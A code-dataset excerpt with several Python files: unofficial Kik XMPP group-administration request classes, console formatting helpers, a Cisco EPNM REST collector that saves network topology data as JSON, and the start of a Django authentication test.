78073fc8af50bf27b8c261533f9cde30f745412e
|
[
"MIT"
] | 120
|
2017-07-07T14:07:14.000Z
|
2022-02-22T03:14:23.000Z
|
kik_unofficial/datatypes/xmpp/group_adminship.py
|
TheGreatCodeholio/kik-bot-api-unofficial
|
c1f02b735dcb3e1d1b5e29a1ca04dd2f66557248
|
[
"MIT"
] | 173
|
2017-07-07T04:31:19.000Z
|
2021-11-20T02:59:20.000Z
|
kik_unofficial/datatypes/xmpp/group_adminship.py
|
TheGreatCodeholio/kik-bot-api-unofficial
|
c1f02b735dcb3e1d1b5e29a1ca04dd2f66557248
|
[
"MIT"
] | 101
|
2017-07-11T19:43:17.000Z
|
2022-03-03T02:04:05.000Z
|
from typing import List, Union
from kik_unofficial.datatypes.xmpp.base_elements import XMPPElement
class AddToGroupRequest(XMPPElement):
    """IQ stanza that asks Kik to add a single member to a group."""

    def __init__(self, group_jid, peer_jid):
        super().__init__()
        self.group_jid = group_jid
        self.peer_jid = peer_jid

    def serialize(self) -> bytes:
        """Build the kik:groups:admin IQ and return it encoded as bytes."""
        # message_id presumably comes from the XMPPElement base — confirm there.
        stanza = ('<iq type="set" id="{}">'
                  '<query xmlns="kik:groups:admin">'
                  '<g jid="{}">'
                  '<m>{}</m>'
                  '</g>'
                  '</query>'
                  '</iq>')
        return stanza.format(self.message_id, self.group_jid, self.peer_jid).encode()
class ChangeGroupNameRequest(XMPPElement):
    """IQ stanza that renames a group (the <n> element carries the new name)."""

    def __init__(self, group_jid, new_name):
        super().__init__()
        self.group_jid = group_jid
        self.new_name = new_name

    def serialize(self) -> bytes:
        """Build the kik:groups:admin IQ and return it encoded as bytes."""
        stanza = ('<iq type="set" id="{}">'
                  '<query xmlns="kik:groups:admin">'
                  '<g jid="{}">'
                  '<n>{}</n>'
                  '</g>'
                  '</query>'
                  '</iq>')
        return stanza.format(self.message_id, self.group_jid, self.new_name).encode()
class RemoveFromGroupRequest(XMPPElement):
    """IQ stanza that removes a member from a group (<m r="1">)."""

    def __init__(self, group_jid, peer_jid):
        super().__init__()
        self.group_jid = group_jid
        self.peer_jid = peer_jid

    def serialize(self) -> bytes:
        """Build the kik:groups:admin IQ and return it encoded as bytes."""
        stanza = ('<iq type="set" id="{}">'
                  '<query xmlns="kik:groups:admin">'
                  '<g jid="{}">'
                  '<m r="1">{}</m>'
                  '</g>'
                  '</query>'
                  '</iq>')
        return stanza.format(self.message_id, self.group_jid, self.peer_jid).encode()
class UnbanRequest(XMPPElement):
    """IQ stanza that lifts a ban on a user (<b r="1">)."""

    def __init__(self, group_jid, peer_jid):
        super().__init__()
        self.group_jid = group_jid
        self.peer_jid = peer_jid

    def serialize(self) -> bytes:
        """Build the kik:groups:admin IQ and return it encoded as bytes."""
        stanza = ('<iq type="set" id="{}">'
                  '<query xmlns="kik:groups:admin">'
                  '<g jid="{}">'
                  '<b r="1">{}</b>'
                  '</g>'
                  '</query>'
                  '</iq>')
        return stanza.format(self.message_id, self.group_jid, self.peer_jid).encode()
class BanMemberRequest(XMPPElement):
    """IQ stanza that bans a member from a group (<b>)."""

    def __init__(self, group_jid, peer_jid):
        super().__init__()
        self.group_jid = group_jid
        self.peer_jid = peer_jid

    def serialize(self) -> bytes:
        """Build the kik:groups:admin IQ and return it encoded as bytes."""
        stanza = ('<iq type="set" id="{}">'
                  '<query xmlns="kik:groups:admin">'
                  '<g jid="{}">'
                  '<b>{}</b>'
                  '</g>'
                  '</query>'
                  '</iq>')
        return stanza.format(self.message_id, self.group_jid, self.peer_jid).encode()
class LeaveGroupRequest(XMPPElement):
    """IQ stanza by which the current user leaves a group (<l />)."""

    def __init__(self, group_jid):
        super().__init__()
        self.group_jid = group_jid

    def serialize(self) -> bytes:
        """Build the kik:groups:admin IQ and return it encoded as bytes."""
        stanza = ('<iq type="set" id="{}">'
                  '<query xmlns="kik:groups:admin">'
                  '<g jid="{}">'
                  '<l />'
                  '</g>'
                  '</query>'
                  '</iq>')
        return stanza.format(self.message_id, self.group_jid).encode()
class PromoteToAdminRequest(XMPPElement):
    """IQ stanza that grants a member admin status (<m a="1">)."""

    def __init__(self, group_jid, peer_jid):
        super().__init__()
        self.group_jid = group_jid
        self.peer_jid = peer_jid

    def serialize(self) -> bytes:
        """Build the kik:groups:admin IQ and return it encoded as bytes."""
        stanza = ('<iq type="set" id="{}">'
                  '<query xmlns="kik:groups:admin">'
                  '<g jid="{}">'
                  '<m a="1">{}</m>'
                  '</g>'
                  '</query>'
                  '</iq>')
        return stanza.format(self.message_id, self.group_jid, self.peer_jid).encode()
class DemoteAdminRequest(XMPPElement):
    """IQ stanza that revokes a member's admin status (<m a="0">)."""

    def __init__(self, group_jid, peer_jid):
        super().__init__()
        self.group_jid = group_jid
        self.peer_jid = peer_jid

    def serialize(self) -> bytes:
        """Build the kik:groups:admin IQ and return it encoded as bytes."""
        stanza = ('<iq type="set" id="{}">'
                  '<query xmlns="kik:groups:admin">'
                  '<g jid="{}">'
                  '<m a="0">{}</m>'
                  '</g>'
                  '</query>'
                  '</iq>')
        return stanza.format(self.message_id, self.group_jid, self.peer_jid).encode()
class AddMembersRequest(XMPPElement):
    """IQ stanza that adds one or more members to a group in a single request.

    Accepts either a single JID string or a list of JIDs; the input is
    normalized to a list so serialize() can handle both uniformly.
    """

    def __init__(self, group_jid, peer_jids: Union[str, List[str]]):
        super().__init__()
        self.group_jid = group_jid
        # Use the builtin `list` for the runtime check: typing.List is an
        # annotation alias (deprecated since 3.9) and is not the idiomatic
        # target for isinstance().
        if isinstance(peer_jids, list):
            self.peer_jids = peer_jids
        else:
            self.peer_jids = [peer_jids]

    def serialize(self) -> bytes:
        """Render one <m> element per member inside the kik:groups:admin IQ."""
        items = ''.join(['<m>{}</m>'.format(jid) for jid in self.peer_jids])
        data = ('<iq type="set" id="{}">'
                '<query xmlns="kik:groups:admin">'
                '<g jid="{}">'
                '{}'
                '</g>'
                '</query>'
                '</iq>').format(self.message_id, self.group_jid, items)
        return data.encode()
| 31.582278
| 79
| 0.492585
| 538
| 4,990
| 4.282528
| 0.118959
| 0.125
| 0.140625
| 0.125
| 0.81684
| 0.784288
| 0.759549
| 0.732205
| 0.705295
| 0.705295
| 0
| 0.00121
| 0.337675
| 4,990
| 157
| 80
| 31.783439
| 0.695915
| 0
| 0
| 0.755725
| 0
| 0
| 0.172144
| 0.04509
| 0
| 0
| 0
| 0
| 0
| 1
| 0.137405
| false
| 0
| 0.015267
| 0
| 0.290076
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c9c74e4767caa6c14f24cbbb5f0e6ea580eacaa5
| 145
|
py
|
Python
|
project/confidence/utils.py
|
StealthTech/django-conf
|
bc73ef5e868a4088d962714cb63acd43393f6413
|
[
"Apache-2.0"
] | 1
|
2018-04-10T19:42:52.000Z
|
2018-04-10T19:42:52.000Z
|
project/confidence/utils.py
|
StealthTech/django-conf
|
bc73ef5e868a4088d962714cb63acd43393f6413
|
[
"Apache-2.0"
] | 7
|
2019-12-04T21:46:34.000Z
|
2022-02-10T07:59:32.000Z
|
project/confidence/utils.py
|
StealthTech/django-confidence
|
bc73ef5e868a4088d962714cb63acd43393f6413
|
[
"Apache-2.0"
] | null | null | null |
def print_formatted(s, level=0):
    """Print *s* behind `level` dashes and an arrow marker."""
    prefix = '-' * level
    print(prefix + f'—> {s}')
def input_formatted(s, level=0):
    """Prompt with *s* behind `level` dashes; return what the user types."""
    prompt = '-' * level + f'<— {s}'
    return input(prompt)
| 20.714286
| 41
| 0.551724
| 23
| 145
| 3.478261
| 0.434783
| 0.25
| 0.375
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017241
| 0.2
| 145
| 6
| 42
| 24.166667
| 0.655172
| 0
| 0
| 0
| 0
| 0
| 0.096552
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.25
| 0.75
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
|
0
| 8
|
4ec8834733b58a7cfe1f817718dec3b176ebd06f
| 128
|
py
|
Python
|
lib/web/pages/__init__.py
|
cookieisland/cabernet
|
9f429fe7a75707da97133b7ec4b3cf6b7aaec6cd
|
[
"MIT"
] | 16
|
2021-08-30T07:05:28.000Z
|
2022-03-04T06:46:42.000Z
|
lib/web/pages/__init__.py
|
cookieisland/cabernet
|
9f429fe7a75707da97133b7ec4b3cf6b7aaec6cd
|
[
"MIT"
] | 7
|
2021-08-30T01:33:52.000Z
|
2022-03-23T10:19:38.000Z
|
lib/web/pages/__init__.py
|
cookieisland/cabernet
|
9f429fe7a75707da97133b7ec4b3cf6b7aaec6cd
|
[
"MIT"
] | 9
|
2021-08-29T21:49:03.000Z
|
2022-03-12T19:59:29.000Z
|
import lib.web.pages.background
import lib.web.pages.index_js
import lib.web.pages.web_urls
import lib.web.pages.dashstatus_json
| 32
| 36
| 0.851563
| 23
| 128
| 4.608696
| 0.434783
| 0.339623
| 0.45283
| 0.641509
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054688
| 128
| 4
| 36
| 32
| 0.876033
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
14d2ba63fe407588d476bfc9d97cbc7e67632cbb
| 17,253
|
py
|
Python
|
collectioncode/collect.py
|
jbrentfoster/autosrlg
|
ee30fcb14004544f3487485c8f832830582699a4
|
[
"MIT"
] | null | null | null |
collectioncode/collect.py
|
jbrentfoster/autosrlg
|
ee30fcb14004544f3487485c8f832830582699a4
|
[
"MIT"
] | null | null | null |
collectioncode/collect.py
|
jbrentfoster/autosrlg
|
ee30fcb14004544f3487485c8f832830582699a4
|
[
"MIT"
] | null | null | null |
import collectioncode.utils
import time
import re
import json
import logging
import sys
import shutil
def runcollector(baseURL, epnmuser, epnmpassword):
    """Run the full EPNM collection sequence against *baseURL*.

    Fetches, in order: L1 (NCS 2000) nodes, 4k (NCS 4000) nodes, L1
    links, SRRGs, SRRG pools, and both och-layer and physical-layer
    topological links.  Each helper writes its own output files; this
    function only orchestrates.
    """
    logging.info("Collecting L1 nodes...")
    collectL1Nodes_json(baseURL, epnmuser, epnmpassword)
    logging.info("Collecting 4k nodes...")
    collect4kNodes_json(baseURL, epnmuser, epnmpassword)
    logging.info("Collecting L1 links...")
    collectL1links_json(baseURL, epnmuser, epnmpassword)
    logging.info("Collecting SRRGs...")
    collectSRRGs_json(baseURL, epnmuser, epnmpassword)
    logging.info("Collecting SRRG pools...")
    collectSRRG_pools_json(baseURL, epnmuser, epnmpassword)
    logging.info("Collecting Topological Links...")
    collectTopoLinks_json(baseURL, epnmuser, epnmpassword)
    collectTopoLinksPhysical_json(baseURL, epnmuser, epnmpassword)
def collectSRRGsOnly(baseURL, epnmuser, epnmpassword):
    """Collect only SRRGs and SRRG pools (subset of runcollector)."""
    logging.info("Collecting SRRGs...")
    collectSRRGs_json(baseURL, epnmuser, epnmpassword)
    logging.info("Collecting SRRG pools...")
    collectSRRG_pools_json(baseURL, epnmuser, epnmpassword)
def collectL1Nodes_json(baseURL, epnmuser, epnmpassword):
    """Collect NCS 2000 (L1) nodes from EPNM and write them to disk.

    Pages through the cisco-resource-physical:node REST resource 100
    records at a time, merges the pages into one dict, dumps the raw
    result to jsongets/l1-nodes.json, then re-reads that file and writes
    a simplified {'NodeN': {Name, fdn, Latitude, Longitude}} database to
    jsonfiles/l1-nodes_db.json.
    """
    incomplete = True
    startindex = 0
    jsonmerged = {}
    while incomplete:
        uri = "/data/v1/cisco-resource-physical:node?product-series=Cisco Network Convergence System 2000 Series&.depth=1&.startIndex=" + str(
            startindex)
        jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
        jsonaddition = json.loads(jsonresponse)
        firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
        lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
        # A full page spans 100 records (indexes differ by 99); a lastIndex
        # of -1 apparently signals an empty response — TODO confirm with the
        # EPNM API docs.
        if (lastindex - firstindex) == 99 and lastindex != -1:
            startindex += 100
            merge(jsonmerged, jsonaddition)
        elif lastindex == -1:
            incomplete = False
        else:
            # Short (final) page: merge it and stop paging.
            incomplete = False
            merge(jsonmerged, jsonaddition)
    with open("jsongets/l1-nodes.json", 'w', encoding="utf8") as f:
        # f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
        json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
        f.close()  # redundant inside `with`, but harmless
    with open("jsongets/l1-nodes.json", 'r', encoding="utf8") as f:
        jsonresponse = f.read()
        f.close()
    thejson = json.loads(jsonresponse)
    l1nodes = {}
    i = 1
    with open("jsonfiles/l1-nodes_db.json", 'w', encoding="utf8") as f:
        for node in thejson['com.response-message']['com.data']['nd.node']:
            if node['nd.product-series'] == "Cisco Network Convergence System 2000 Series":
                nodeName = node['nd.name']
                fdn = node['nd.fdn']
                logging.info("Processing node " + nodeName)
                try:
                    latitude = node['nd.latitude']
                    longitude = node['nd.longitude']
                except KeyError:
                    # Nodes without coordinates fall back to 0.0/0.0.
                    logging.error(
                        "Could not get longitude or latitidude for node " + nodeName + ". Setting to 0.0 and 0.0")
                    latitude = {'fdtn.double-amount': 0.0, 'fdtn.units': 'DEGREES_DECIMAL'}
                    longitude = {'fdtn.double-amount': 0.0, 'fdtn.units': 'DEGREES_DECIMAL'}
                l1nodes['Node' + str(i)] = dict(
                    [('Name', nodeName), ('fdn', fdn), ('Latitude', latitude), ('Longitude', longitude)])
                i += 1
        # f.write(json.dumps(l1nodes, f, sort_keys=True, indent=4, separators=(',', ': ')))
        json.dump(l1nodes, f, sort_keys=True, indent=4, separators=(',', ': '))
        f.close()
def collect4kNodes_json(baseURL, epnmuser, epnmpassword):
    """Collect NCS 4000 nodes from EPNM and write them to disk.

    Same paging-and-simplify flow as collectL1Nodes_json, but filtered on
    the "Cisco Network Convergence System 4000 Series" product series;
    output goes to jsongets/4k-nodes.json and jsonfiles/4k-nodes_db.json.
    """
    incomplete = True
    startindex = 0
    jsonmerged = {}
    while incomplete:
        uri = "/data/v1/cisco-resource-physical:node?product-series=Cisco Network Convergence System 4000 Series&.startIndex=" + str(
            startindex)
        jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
        jsonaddition = json.loads(jsonresponse)
        firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
        lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
        # Full page -> fetch next 100; lastIndex == -1 apparently means no
        # data; otherwise this was the final, short page.
        if (lastindex - firstindex) == 99 and lastindex != -1:
            startindex += 100
            merge(jsonmerged, jsonaddition)
        elif lastindex == -1:
            incomplete = False
        else:
            incomplete = False
            merge(jsonmerged, jsonaddition)
    with open("jsongets/4k-nodes.json", 'w', encoding="utf8") as f:
        # f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
        json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
        f.close()  # redundant inside `with`, but harmless
    with open("jsongets/4k-nodes.json", 'r', encoding="utf8") as f:
        jsonresponse = f.read()
        f.close()
    thejson = json.loads(jsonresponse)
    l1nodes = {}
    i = 1
    with open("jsonfiles/4k-nodes_db.json", 'w', encoding="utf8") as f:
        for node in thejson['com.response-message']['com.data']['nd.node']:
            if node['nd.product-series'] == "Cisco Network Convergence System 4000 Series":
                nodeName = node['nd.name']
                fdn = node['nd.fdn']
                logging.info("Processing node " + nodeName)
                try:
                    latitude = node['nd.latitude']
                    longitude = node['nd.longitude']
                except KeyError:
                    # Nodes without coordinates fall back to 0.0/0.0.
                    logging.error(
                        "Could not get longitude or latitidude for node " + nodeName + ". Setting to 0.0 and 0.0")
                    latitude = {'fdtn.double-amount': 0.0, 'fdtn.units': 'DEGREES_DECIMAL'}
                    longitude = {'fdtn.double-amount': 0.0, 'fdtn.units': 'DEGREES_DECIMAL'}
                l1nodes['Node' + str(i)] = dict(
                    [('Name', nodeName), ('fdn', fdn), ('Latitude', latitude), ('Longitude', longitude)])
                i += 1
        # f.write(json.dumps(l1nodes, f, sort_keys=True, indent=4, separators=(',', ': ')))
        json.dump(l1nodes, f, sort_keys=True, indent=4, separators=(',', ': '))
        f.close()
def collectL1links_json(baseURL, epnmuser, epnmpassword):
    """Collect ots-layer (L1) topological links from EPNM.

    Pages through the topological-link resource, dumps the raw merge to
    jsongets/l1-links.json, then writes a simplified
    {'LinkN': {fdn, Nodes}} database to jsonfiles/l1-links_db.json.
    Links without an endpoint list or without 'topo.total-capacity' are
    skipped.
    """
    incomplete = True
    startindex = 0
    jsonmerged = {}
    while incomplete:
        uri = "/data/v1/cisco-resource-network:topological-link?topo-layer=ots-link-layer&.startIndex=" + str(
            startindex)
        jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
        jsonaddition = json.loads(jsonresponse)
        firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
        lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
        # Full page -> fetch next 100; lastIndex == -1 apparently means no
        # data; otherwise this was the final, short page.
        if (lastindex - firstindex) == 99 and lastindex != -1:
            startindex += 100
            merge(jsonmerged, jsonaddition)
        elif lastindex == -1:
            incomplete = False
        else:
            incomplete = False
            merge(jsonmerged, jsonaddition)
    with open("jsongets/l1-links.json", 'w', encoding="utf8") as f:
        # f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
        json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
        f.close()  # redundant inside `with`, but harmless
    with open("jsongets/l1-links.json", 'r', encoding="utf8") as f:
        jsonresponse = f.read()
        f.close()
    thejson = json.loads(jsonresponse)
    l1links = {}
    i = 1
    with open("jsonfiles/l1-links_db.json", 'w', encoding="utf8") as f:
        for link in thejson['com.response-message']['com.data']['topo.topological-link']:
            fdn = link['topo.fdn']
            logging.info("Processing link " + fdn)
            nodes = []
            try:
                endpointlist = link['topo.endpoint-list']['topo.endpoint']
            except Exception as err:
                logging.error("L1 link does not have valid topo.end-point-list, skipping this link: " + fdn)
                continue
            try:
                topo_capacity = link['topo.total-capacity']
            except Exception as err:
                # link is not a 2k ROADM link, ignore it
                continue
            if len(endpointlist) > 1:
                for ep in endpointlist:
                    endpoint = ep['topo.endpoint-ref']
                    # Node name is the value of the second '!'-separated
                    # segment of the endpoint ref.
                    node = endpoint.split('!')[1].split('=')[1]
                    nodes.append(node)
                if len(nodes) > 1:
                    # Vestigial duplicate check: always False, so the
                    # branch below always executes.
                    duplicates = False
                    if not duplicates:
                        l1links['Link' + str(i)] = dict([('fdn', fdn)])
                        l1links['Link' + str(i)]['Nodes'] = nodes
                        i += 1
        # f.write(json.dumps(l1links, f, sort_keys=True, indent=4, separators=(',', ': ')))
        json.dump(l1links, f, sort_keys=True, indent=4, separators=(',', ': '))
        f.close()
def collectSRRGs_json(baseURL, epnmuser, epnmpassword):
    """Collect shared-risk resource groups and dump the raw merged JSON.

    Pages through the shared-risk-resource-group resource 100 records at
    a time and writes the merged result to jsongets/SRRGs.json (no
    simplified database is produced for SRRGs).
    """
    incomplete = True
    startindex = 0
    jsonmerged = {}
    while incomplete:
        uri = "/data/v1/cisco-resource-network:shared-risk-resource-group?.startIndex=" + str(startindex)
        jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
        jsonaddition = json.loads(jsonresponse)
        firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
        lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
        # Full page -> fetch next 100; lastIndex == -1 apparently means no
        # data; otherwise this was the final, short page.
        if (lastindex - firstindex) == 99 and lastindex != -1:
            startindex += 100
            merge(jsonmerged, jsonaddition)
        elif lastindex == -1:
            incomplete = False
        else:
            incomplete = False
            merge(jsonmerged, jsonaddition)
    with open("jsongets/SRRGs.json", 'w', encoding="utf8") as f:
        # f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
        json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
        f.close()  # redundant inside `with`, but harmless
def collectSRRG_pools_json(baseURL, epnmuser, epnmpassword):
    """Collect SRRG pools and dump the raw merged JSON.

    Pages through the srrg-pool resource 100 records at a time and
    writes the merged result to jsongets/SRRG_pools.json.
    """
    incomplete = True
    startindex = 0
    jsonmerged = {}
    while incomplete:
        uri = "/data/v1/cisco-resource-network:srrg-pool?.startIndex=" + str(startindex)
        jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
        jsonaddition = json.loads(jsonresponse)
        firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
        lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
        # Full page -> fetch next 100; lastIndex == -1 apparently means no
        # data; otherwise this was the final, short page.
        if (lastindex - firstindex) == 99 and lastindex != -1:
            startindex += 100
            merge(jsonmerged, jsonaddition)
        elif lastindex == -1:
            incomplete = False
        else:
            incomplete = False
            merge(jsonmerged, jsonaddition)
    with open("jsongets/SRRG_pools.json", 'w', encoding="utf8") as f:
        # f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
        json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
        f.close()  # redundant inside `with`, but harmless
def collectTopoLinks_json(baseURL, epnmuser, epnmpassword):
    """Collect och-layer topological links from EPNM.

    Pages through the topological-link resource, dumps the raw merge to
    jsongets/topo-links.json, then writes a simplified
    {'LinkN': {fdn, Nodes: [{node, ctp}, ...]}} database to
    jsonfiles/topolinks_add_drop_db.json.  Links without a valid
    endpoint list are skipped.
    """
    incomplete = True
    startindex = 0
    jsonmerged = {}
    while incomplete:
        uri = "/data/v1/cisco-resource-network:topological-link?topo-layer=och-link-layer&.startIndex=" + str(
            startindex)
        jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
        jsonaddition = json.loads(jsonresponse)
        firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
        lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
        # Full page -> fetch next 100; lastIndex == -1 apparently means no
        # data; otherwise this was the final, short page.
        if (lastindex - firstindex) == 99 and lastindex != -1:
            startindex += 100
            merge(jsonmerged, jsonaddition)
        elif lastindex == -1:
            incomplete = False
        else:
            incomplete = False
            merge(jsonmerged, jsonaddition)
    with open("jsongets/topo-links.json", 'w', encoding="utf8") as f:
        # f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
        json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
        f.close()  # redundant inside `with`, but harmless
    with open("jsongets/topo-links.json", 'r', encoding="utf8") as f:
        jsonresponse = f.read()
        f.close()
    thejson = json.loads(jsonresponse)
    topolinks = {}
    i = 1
    with open("jsonfiles/topolinks_add_drop_db.json", 'w', encoding="utf8") as f:
        for link in thejson['com.response-message']['com.data']['topo.topological-link']:
            fdn = link['topo.fdn']
            logging.info("Processing topological link " + fdn)
            nodes = []
            try:
                endpointlist = link['topo.endpoint-list']['topo.endpoint']
            except Exception as err:
                logging.error("Topo link does not have valid topo.end-point-list, skipping this link: " + fdn)
                continue
            if len(endpointlist) > 1:
                for ep in endpointlist:
                    endpoint = ep['topo.endpoint-ref']
                    # Node and CTP names are pulled from '!'-separated
                    # segments of the endpoint ref.
                    node = endpoint.split('!')[1].split('=')[1]
                    ctp = endpoint.split('!')[2].split('=')[2]
                    entry = {'node': node, 'ctp': ctp}
                    nodes.append(entry)
                if len(nodes) > 1:
                    topolinks['Link' + str(i)] = dict([('fdn', fdn)])
                    topolinks['Link' + str(i)]['Nodes'] = nodes
                    i += 1
        json.dump(topolinks, f, sort_keys=True, indent=4, separators=(',', ': '))
        f.close()
def collectTopoLinksPhysical_json(baseURL, epnmuser, epnmpassword):
    """Collect physical-layer topological links from EPNM.

    Same flow as collectTopoLinks_json but for the physical-link-layer;
    raw merge goes to jsongets/topo-links-physical.json and the
    simplified database to jsonfiles/topolinks_physical_db.json.  Unlike
    the och-layer collector, non-dict entries are skipped and the
    endpoint list is accessed without a try/except.
    """
    incomplete = True
    startindex = 0
    jsonmerged = {}
    while incomplete:
        uri = "/data/v1/cisco-resource-network:topological-link?topo-layer=physical-link-layer&.startIndex=" + str(
            startindex)
        jsonresponse = collectioncode.utils.rest_get_json(baseURL, uri, epnmuser, epnmpassword)
        jsonaddition = json.loads(jsonresponse)
        firstindex = jsonaddition['com.response-message']['com.header']['com.firstIndex']
        lastindex = jsonaddition['com.response-message']['com.header']['com.lastIndex']
        # Full page -> fetch next 100; lastIndex == -1 apparently means no
        # data; otherwise this was the final, short page.
        if (lastindex - firstindex) == 99 and lastindex != -1:
            startindex += 100
            merge(jsonmerged, jsonaddition)
        elif lastindex == -1:
            incomplete = False
        else:
            incomplete = False
            merge(jsonmerged, jsonaddition)
    with open("jsongets/topo-links-physical.json", 'w', encoding="utf8") as f:
        # f.write(json.dumps(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': ')))
        json.dump(jsonmerged, f, sort_keys=True, indent=4, separators=(',', ': '))
        f.close()  # redundant inside `with`, but harmless
    with open("jsongets/topo-links-physical.json", 'r', encoding="utf8") as f:
        jsonresponse = f.read()
        f.close()
    thejson = json.loads(jsonresponse)
    topolinks = {}
    i = 1
    with open("jsonfiles/topolinks_physical_db.json", 'w', encoding="utf8") as f:
        for link in thejson['com.response-message']['com.data']['topo.topological-link']:
            if isinstance(link, dict):
                fdn = link['topo.fdn']
                logging.info("Processing topological link " + fdn)
                nodes = []
                endpointlist = link['topo.endpoint-list']['topo.endpoint']
                if len(endpointlist) > 1:
                    for ep in endpointlist:
                        endpoint = ep['topo.endpoint-ref']
                        # print "Endpoint is: " + endpoint
                        node = endpoint.split('!')[1].split('=')[1]
                        ctp = endpoint.split('!')[2].split('=')[2]
                        entry = {'node': node, 'ctp': ctp}
                        nodes.append(entry)
                    if len(nodes) > 1:
                        topolinks['Link' + str(i)] = dict([('fdn', fdn)])
                        topolinks['Link' + str(i)]['Nodes'] = nodes
                        i += 1
        json.dump(topolinks, f, sort_keys=True, indent=4, separators=(',', ': '))
        f.close()
def merge(a, b):
    """Recursively merge dict *b* into dict *a* in place and return *a*.

    Rules applied per key of *b*:
      - key absent from *a*: value copied into *a*
      - both values are dicts: merged recursively
      - both values are lists: concatenated (*a*'s items first)
      - any other collision: *a*'s existing value is kept and *b*'s
        value is silently dropped (*a* wins on scalar conflicts)
    """
    for key in b:
        if key in a:
            if isinstance(a[key], dict) and isinstance(b[key], dict):
                # Both sides are dicts: descend and merge their contents.
                merge(a[key], b[key])
            elif isinstance(a[key], list) and isinstance(b[key], list):
                # Both sides are lists: append b's items after a's.
                a[key] = a[key] + b[key]
        else:
            # Key only present in b: add it to a.
            a[key] = b[key]
    return a
| 45.046997
| 142
| 0.57619
| 1,855
| 17,253
| 5.321833
| 0.095957
| 0.050648
| 0.020057
| 0.028971
| 0.93284
| 0.902249
| 0.880369
| 0.85393
| 0.849676
| 0.845827
| 0
| 0.015621
| 0.280183
| 17,253
| 382
| 143
| 45.164921
| 0.77929
| 0.075117
| 0
| 0.776758
| 0
| 0.018349
| 0.205204
| 0.063824
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030581
| false
| 0.076453
| 0.021407
| 0
| 0.055046
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
14d3a517fa2fe056b31e1803138f147d60fa5266
| 9,047
|
py
|
Python
|
app/account/tests/test_auth_api.py
|
bondeveloper/maischool
|
16bf2afe99d26caa067b7912e88839639cf2191e
|
[
"MIT"
] | null | null | null |
app/account/tests/test_auth_api.py
|
bondeveloper/maischool
|
16bf2afe99d26caa067b7912e88839639cf2191e
|
[
"MIT"
] | null | null | null |
app/account/tests/test_auth_api.py
|
bondeveloper/maischool
|
16bf2afe99d26caa067b7912e88839639cf2191e
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.contrib.auth import get_user_model
from rest_framework.test import APIClient
from rest_framework import status
class TestAuthApi(TestCase):
    """End-to-end tests for the registration/login/token auth endpoints.

    Uses the modern ``assertEqual`` (``assertEquals`` is a deprecated
    alias removed in Python 3.12).
    """
    # if anyones knows how to reverse this path, feel free to make edits
    reg_url = '/api/v1/accounts/auth/registration/'
    login_url = '/api/v1/accounts/auth/login/'
